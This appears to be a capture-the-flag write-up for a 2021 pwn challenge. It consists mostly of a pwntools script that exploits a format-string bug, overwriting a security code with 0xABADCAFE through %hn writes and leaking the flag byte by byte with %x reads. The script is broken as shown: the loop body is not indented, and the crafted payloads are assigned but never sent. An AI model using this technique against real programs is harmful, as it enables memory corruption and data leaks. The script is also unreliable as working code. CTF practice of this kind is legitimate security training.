
from pwn import *

flag = ''

# We will hit program for 30 iterations (just a number to get all available characters in flag)
# And in each try will change offset of getting flag value.
for i in range(30):

# First we will connect to program using pwntools methods.
# r = process("./securitycode")
r = remote('', 7040)

# First Send A to be forwarded to hello_admin
r.recvuntil("Enter 'A' for admin and 'U' for user.")

# Value to overwrite is: xABADCAFE
# ABAD: 43949
# CAFE: 51966
# So we need to first write this value in location of security_code address,
# But cause it's more than two bytes, we will try to write two times in our format string payload.
# cause CAFE is of a higher value we should first write it in location 15 from stack
r.recvuntil('Enter you name:')
payload = '\x3e\xc0\x04\x08\x3c\xc0\x04\x08%43941x%15$hn%8017x%16$hn'

# Now try to read of the flag step by step
r.recvuntil('Enter your password:')
payload = '%{}$x'.format(i)

x = r.recvline()
x += r.recvline()
x += r.recvline()
x = x.replace('The password is ', '').strip()
# it's just a method i used, it's not very clean, but got me the flag :)!
flag += bytearray.fromhex(x).decode()[::-1]


[Original Writeup with more details](https://github.com/Execut3/CTF-WriteUps/tree/master/2021/TMUCTF/Pwn/Security%20Code)

Original writeup (https://github.com/Execut3/CTF-WriteUps/tree/master/2021/TMUCTF/Pwn/Security%20Code).